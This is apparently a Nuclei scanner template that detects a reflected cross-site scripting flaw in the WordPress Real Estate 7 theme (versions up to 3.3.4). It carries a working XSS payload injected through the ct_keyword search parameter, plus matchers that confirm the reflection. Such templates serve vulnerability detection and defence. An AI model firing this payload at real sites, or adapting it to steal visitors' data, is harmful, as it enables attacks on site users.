id: wp-real-estate-xss

info:
  name: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39344
    - https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
    - https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
    cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/themes/realestate-7/"
    product: real_estate_7
    vendor: contempothemes
  tags: packetstorm,wordpress,wp-theme,wp,xss,realestate

http:
  - method: GET
    path:
      - "{{BaseURL}}/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<img src=x onerror=prompt(document.domain)>")'
          - 'contains(body, "/wp-content/themes/realestate-7/")'
        condition: and
# digest: 4a0a0047304502202719aeff385d74065f0b0f874504b56503616518964344d3cdfa453a18be3405022100e6d9c17c6c1f78ca3ff4b81f52920d90163eea84186a1d45bdf3650b631d6902:922c64590222798bb761d5b6d8e72950